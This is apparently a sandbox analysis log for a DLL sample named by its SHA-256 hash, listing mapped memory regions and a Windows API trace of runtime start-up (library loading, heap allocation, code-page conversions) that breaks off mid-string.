"private_0x00000000005d0000" filename = "" Region: id = 15650 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15651 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15652 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15653 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 15654 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15655 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15656 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15657 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 15658 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 15660 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15661 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 15662 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 15663 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 15664 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 15665 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 15666 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 15667 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 15668 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 15669 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 15670 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 15671 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 15673 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 15674 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 15675 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 15676 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15677 start_va = 0x6d0000 end_va = 0x857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 15678 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15679 start_va = 0x860000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 15680 start_va = 0x9f0000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 15681 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 15682 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 15683 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 15684 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 15685 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 15686 start_va = 0x1df0000 end_va = 0x1eaffff monitored = 0 entry_point = 0x1e10da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 15687 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 15689 start_va = 0x1df0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 15690 start_va = 0x1ef0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 15691 start_va = 0x20f0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 15692 start_va = 0x24f0000 end_va = 0x2ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 15697 start_va = 0x2cf0000 end_va = 0x3cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 16921 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 16933 start_va = 0x3cc0000 end_va = 0x3ff6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 16975 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 16976 start_va = 0x4000000 end_va = 0x4288fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 16985 start_va = 0x4000000 end_va = 0x4151fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 16989 start_va = 0x4000000 end_va = 0x41c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 18233 start_va = 0x4000000 end_va = 0x558dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Thread: id = 230 os_tid = 0x12dc [0276.923] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0276.923] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0276.923] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0276.923] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0276.924] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0276.924] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0276.925] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0276.925] GetProcessHeap () returned 0x5d0000 [0276.925] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0276.926] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0276.926] GetLastError () returned 0x7e [0276.926] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0276.926] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0276.926] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3c8) returned 0x5dc320 [0276.926] SetLastError (dwErrCode=0x7e) [0276.926] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x1200) returned 0x5e3470 [0276.929] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0276.929] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0276.929] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0276.929] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0276.929] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_create" [0276.929] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_create" [0276.929] GetACP () returned 0x4e4 [0276.929] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x228) returned 0x5d5380 [0276.929] IsValidCodePage (CodePage=0x4e4) returned 1 [0276.929] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0276.929] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0276.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0276.929] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0276.929] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0276.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0276.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0276.930] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0276.930] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0276.930] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0276.930] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0276.930] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0276.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0276.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0276.930] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0276.930] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0276.930] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 